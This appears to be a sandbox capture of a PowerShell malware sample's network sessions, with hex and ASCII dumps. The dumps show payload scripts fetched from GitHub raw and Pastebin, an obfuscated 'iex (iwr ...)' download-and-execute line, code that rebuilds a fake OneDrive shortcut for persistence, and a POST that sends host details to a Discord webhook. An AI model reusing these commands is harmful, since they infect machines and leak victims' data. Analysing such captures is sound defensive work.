                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 3f b7 f1 1b b6 fc ea 5c 6f 96 b3 25 68 2f a7 c1 81 2b 29 52 2c e3 de b2 bb 1a 6e a8 3f c6 e0 09 6a 99 eb b7 74 b8 86 fc 00 e2 b2 31 09 d6 45 4a d5 72 40 5f 88 92 f5 8f b7 ed 65 a0 b8 a6 34 cf cc 94 71 89 87 a2 cf f2 f5 97 18 e8 cf 7f 7c ee 46 d0 50 54 49 1f 33 d7 5b 70 4d 67 2c 1e 64 65 fc 54 6f 93 2d 16 3a 5d f5 7c 23 4c 6d 6e 34 b7 b0 6c 84 60 8e b2 80 f7 e5 fc a7 2a 36 de 11 01 97 81 86 4d 92 80 90 7e 8f de e6 b0 c7 57 21 17 4f e8 ea 9f 18 45 d6 37 25 43 f0 8d 4e 34 31 d4 e2 57 e4 4a e8 01 e0 08 9b dd 3f 59 c3 60 a1 53 d2 6e f4 9a 62 cb df 7a 01 53 c6 20 b5 30 65 8d 7a 84 25 63 ed 40 9a bd 68 53 3c 70 8a 16 73 5e 2f 0c f5 b7 e6 c4 34 d5 23 b3 c7 27 54 6e c9 71 93 88 ff 03 98 c4 c1 1e b5 97 2b c5 b8 fc 4b 45 06 d2 51 a8 fa 50 4f c7 b9 8c 23 5f 69 f1 82
                                                                      Data Ascii: ?\o%h/+)R,n?jt1EJr@_e4q|FPTI3[pMg,deTo-:]|#Lmn4l`*6M~W!OE7%CN41WJ?Y`SnbzS 0ez%c@hS<ps^/4#'Tnq+KEQPO#_i


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449738185.199.109.1334437744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:33 UTC223OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:34 UTC899INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7084
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "19c34b01bc0de3420610e902b58491f6f98d61c6733fbdc38504b32046860435"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: 9790:3FFFA2:8979E5:95DF38:670E73A3
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:33 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210083-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000774.865860,VS0,VE89
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: c0fe96e4d6af2b445297b8007de5d4eaad1345f4
                                                                      Expires: Tue, 15 Oct 2024 14:04:33 GMT
                                                                      Source-Age: 0
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                                      Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                                      Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                                                      Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                                                      Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                                      Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                                                      2024-10-15 13:59:34 UTC194INData Raw: 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                                                      Data Ascii: "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449741172.67.19.244435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:52 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:53 UTC397INHTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 13:59:52 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-frame-options: DENY
                                                                      x-content-type-options: nosniff
                                                                      x-xss-protection: 1;mode=block
                                                                      cache-control: public, max-age=1801
                                                                      CF-Cache-Status: HIT
                                                                      Age: 442
                                                                      Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30550c2d7c2e51-DFW
                                                                      2024-10-15 13:59:53 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                      Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                      2024-10-15 13:59:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449742162.159.138.2324437744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:53 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Content-Type: application/json
                                                                      Host: discord.com
                                                                      Content-Length: 213
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:53 UTC213OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 6a 6f 6e 65 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 73 74 6d 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 5f 35 56 44 47 55 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                      Data Ascii: { "content": "**user** has joined - stm\n----------------------------------\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                      2024-10-15 13:59:53 UTC1255INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 15 Oct 2024 13:59:53 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 45
                                                                      Connection: close
                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1729000794
                                                                      x-ratelimit-reset-after: 1
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWnV7TPvkg5LZKvrTXlOvT%2BEdxRSZVjQR2VHBvQhjXYCguoQolUzOZJtES0lyG%2BnICdJwdZcwfOQEn97tnR8NAh1SKuQGHTtgI%2FOJJHa3khkNkjOBTA3SH4bdh29"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: __cfruid=b96900f5ee5ff634769fa70e31a8093c5cc2c686-1729000793; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: _cfuvid=B9oNm1iH5MaqkqTXcdybFvpTlS5n6AwSsI_dOXK08Wk-1729000793263-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30550d4c198d2d-DFW
                                                                      2024-10-15 13:59:53 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                      Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449744185.199.109.1334435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:54 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:54 UTC902INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7508
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:54 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210162-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000794.418035,VS0,VE110
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: 188e010a3a0b863dba1cbcbf5a537530e2b0c590
                                                                      Expires: Tue, 15 Oct 2024 14:04:54 GMT
                                                                      Source-Age: 0
                                                                      2024-10-15 13:59:54 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                      Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                      2024-10-15 13:59:54 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                      Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                      2024-10-15 13:59:54 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                      Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                      2024-10-15 13:59:54 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                      Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                      2024-10-15 13:59:54 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                      Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
